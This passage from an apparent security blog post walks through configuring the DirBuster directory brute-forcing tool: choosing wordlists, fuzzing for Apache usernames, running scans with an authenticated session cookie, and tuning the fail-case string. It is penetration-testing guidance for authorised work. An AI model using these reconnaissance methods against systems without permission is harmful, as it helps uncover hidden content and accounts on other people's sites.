<p>Assuming you opt for &#8220;List based brute force&#8221; you&#8217;ll now need to choose a dictionary &#8211; and for this you need to know whether or not your directories are case sensitive. Although you can often guess this from the server in use, e.g. IIS isn&#8217;t case sensitive, it&#8217;s always best to check. So test a page that you know to exist, i.e. does <code>/page</code> return the same as <code>/Page</code>? Even when the server is case-sensitive, a look over the site map in your web proxy may show that all the pages you&#8217;ve requested are in fact lower case. But don&#8217;t go thinking that using the case-sensitive lists will take all that much longer. Clicking &#8220;List Info&#8221; brings up some statistics on the dictionaries, a portion of which is shown below:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png"><img class="aligncenter size-full wp-image-187" alt="DirBuster dict list info" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png" width="531" height="354" /></a></p>
<p>You can see that the case-sensitive lists are nowhere near even twice the size of the lowercase versions, which you might have imagined as a minimum. That&#8217;s because the lists are based on <em>real</em> names found by crawling the internet. The file &#8220;directory-list-2.3-small.txt&#8221; has 87,650 entries while the lowercase version has 81,629 entries so it&#8217;s only 6,021 entries longer (about 7% bigger). For the medium-sized lists the numbers are 220,546 vs 207,629 so the case-sensitive version is 12,917 entries longer (about 6% bigger). So using the case-sensitive lists may not involve as big a hit as you might expect. (You can also see from the List Info what the actual difference is between big, medium and little: the entries were found on at least 1, 2 and 3 hosts respectively.)</p>
<p>Before you even start your attack you could consider putting together a small dictionary of a few directories and files you&#8217;ve found, together with some gibberish entries, to use on a test run. If you don&#8217;t see the results you expect, review your configuration bearing in mind some of the points from this article. A short test run might save you hours of wasted effort.</p>
<h3>Starting options</h3>
<p>The &#8220;Standard start point&#8221; will assume directories end with / and files end with whatever you configure underneath. The &#8220;URL Fuzz&#8221; option allows you to insert the dictionary entries into the URL in a non-standard way. A good illustration is to discuss why there&#8217;s an Apache user enumeration list included in the set of dictionaries (apache-user-enum-2.0.txt). This is because if the <code>userdir</code> module is enabled (more on this <a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html">here</a>) you can go hunting for usernames based on the fact that the user &#8220;bob&#8221; will have a folder mapped to <span style="text-decoration: underline;">http://site.com/~bob/</span>. So in this example the URL to fuzz would be <code>/~{dir}/</code> where <code>{dir}</code> is a placeholder for the words in the chosen dictionary.</p>
<p>The remaining options are self-explanatory but there are still a few things to consider. Obviously the more options you tick the longer the scan will take. So look first at the style of URL the website uses. For example, you might find that requests to <code>/page</code> produce redirects to <code>/page/</code> or that both of these return the same response. Either way, don&#8217;t run &#8220;Brute Force Dirs&#8221; together with &#8220;Brute Force Files&#8221;+&#8221;Use Blank Extension&#8221; because you&#8217;re doing twice the amount of work to get the same result. Conversely if you spot that there doesn&#8217;t seem to be much content in directories, i.e. none of the pages end with a / character, then don&#8217;t run &#8220;Brute Force Dirs&#8221;, rely on &#8220;Brute Force Files&#8221; instead.</p>
<p>If you enable the &#8220;Be Recursive&#8221; option, remember that DirBuster&#8217;s multi-threaded approach means that all those queues of work will be competing for a limited set of Workers. It&#8217;s easy to get into a situation where the Workers are looking in sub-folders of no real interest, slowing down the search for better candidates. In a time-limited test you could try looking at just the root content first by disabling this option. Where you go from there can be both manual and automated &#8211; and there&#8217;s always the option to create a custom dictionary for further scans based on the results of the first scan.</p>
<h3>Options Menu</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png"><img class="aligncenter size-full wp-image-189" alt="DirBuster options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png" width="309" height="246" /></a></p>
<p>I&#8217;ve already mentioned &#8220;Follow Redirects&#8221; &#8211; in general, tick this only if you have to because it has the capacity to slow down the scan. Without this ticked, you&#8217;ll see 301 and 302 responses in the final results and you can just manually target the ones of interest later.</p>
<p>Choosing &#8220;Debug Mode&#8221; will only make a difference if you&#8217;re launching DirBuster from a command window that remains open in the background:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png"><img class="aligncenter size-full wp-image-186" alt="DirBuster debug" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png" width="736" height="264" /></a></p>
<p>The references to Worker[n] are to the threads doing the networking so for n threads that you set you&#8217;ll see Workers from [0] to [n-1].</p>
<p>The option &#8220;Parse HTML&#8221;, which is on by default, instructs DirBuster to read the HTML of files that it discovers, looking for files and folders it then doesn&#8217;t have to guess. These can be found, for example, in the <code>href</code> attributes of <code>&lt;a&gt;</code> tags. You might decide this is overkill since DirBuster will quickly begin to download a lot of stuff you&#8217;ll see elsewhere during testing e.g. in Burp&#8217;s Proxy and Site Map. Overall this may add an overhead for results you simply don&#8217;t need &#8211; at least not from this tool on the first scan. There&#8217;s another possible benefit to disabling this when running authenticated scans, which we&#8217;ll come to momentarily.</p>
<h3>Advanced Options</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png"><img class="aligncenter size-full wp-image-185" alt="DirBuster advanced options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png" width="620" height="626" /></a></p>
<p>I&#8217;ll skip the first two tabs, which are self-explanatory, and start with the tab that&#8217;s active in the screenshot above&#8230;</p>
<h4>Http Options</h4>
<p>First, DirBuster allows you to add custom headers to your requests so you could, for example, add an authenticated session management cookie. <em>Whoa! Did you say run an automated scanning tool authenticated?</em> Yes I did. After getting a feel of the site you may be comfortable doing this &#8211; it can pull out some interesting finds (as shown by the case studies at the start of this article). Anything you find authenticated that you didn&#8217;t find unauthenticated is really worth a look. Although the risk of side effects is much lower than running a full-on active web application scanner authenticated across a site, of course I have to say that it&#8217;s not without risk! I disable &#8220;Parse HTML&#8221; and &#8220;Be Recursive&#8221; as a safety measure.</p>
<p>Underneath is the &#8220;Http User Agent&#8221; and you can see the default looks nothing like a real User-Agent string. If you&#8217;re getting odd results from DirBuster that you&#8217;re not seeing in Burp, you could try changing that option, e.g. to &#8220;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0&#8243;.</p>
<p>Lastly, the option to use a proxy is useful for troubleshooting &#8211; as well as learning! You could also take advantage of your upstream proxy&#8217;s features to handle more complex cases (adding an overhead, of course).</p>
<h4><span style="line-height: 1.714285714; font-size: 1rem;">Scan Options</span></h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png"><img class="aligncenter size-full wp-image-190" alt="DirBuster Advanced Options - Scan Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Scan-Options.png" width="549" height="163" /></a></p>
<p>Here lies the all-important &#8220;Fail Case String&#8221;, which by default is &#8220;thereIsNoWayThat-You-CanBeThere&#8221;. The response from this page is used to determine whether or not a guessed page/directory is there so it&#8217;s critical for the success of the scan. DirBuster will request this often in fact &#8211; for every file type in every directory that it finds. So starting from / with all the scan options enabled (directories, files, recursive and blank), having found <code>/admin/users/</code>, for example, DirBuster will request:</p>
<p><code>/admin/users/thereIsNoWayThat-You-CanBeThere/<br />
/admin/users/thereIsNoWayThat-You-CanBeThere<br />
/admin/users/thereIsNoWayThat-You-CanBeThere.php</code></p>
<p>If you&#8217;re getting strange results from DirBuster, consider changing this string. It may even be worth getting into the habit of manually testing the fail case string as a directory and page before you start a lengthy scan.</p>
<h4>DirBuster Options</h4>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png"><img class="aligncenter size-full wp-image-192" alt="DirBuster Advanced Options - Options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-Advanced-Options-Options.png" width="593" height="219" /></a>The last tab serves as a reminder that most of the Options and Advanced Options discussed above get reset when you re-start DirBuster. Only the proxy settings persist beyond the options listed in this tab, which cover the default number of threads, dictionary and file extensions. These options will be pre-populated when you start DirBuster from fresh. Although you&#8217;ll lose many of your options on restart, being forced to reconsider them maybe isn&#8217;t such a bad thing.</p>
<h2>And finally</h2>
<p>It&#8217;s worth starting DirBuster relatively early on in the test because it can take a while to complete, and obviously you want some time left over to explore anything interesting it finds. Keep an eye on the results while it&#8217;s running to make sure you&#8217;re getting something sensible &#8211; and that you&#8217;re not causing a slew of 500 errors. Version 1.0 RC1 will pause automatically after 20 <em>consecutive</em> errors but that&#8217;s <em>client-side</em> errors, not 500 responses. Equally if you&#8217;re getting mostly redirects, try to alter your parameters or, as a last resort, enable the &#8220;Follow Redirects&#8221; option.</p>
<p>Despite &#8211; or because of &#8211; your efforts to optimise your scan, you can often get a large number of hits. On the reporting side, the CSV option is useful because you get the Location, Response Code and Content Length on one line so you can quickly begin to process this and weed out the cruft.</p>
<p>Finally, note that you can invoke a command line interface by running DirBuster in headless mode. Check out the options with <code>java -jar &lt;DirBuster_jar_file&gt; -h</code>. The parameters don&#8217;t comprehensively match the GUI options, though, so if you need a command-line scanner of this type and DirBuster isn&#8217;t up to the job, try <code>dirb</code> (on Kali).</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/three-cheers-for-dirbuster/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
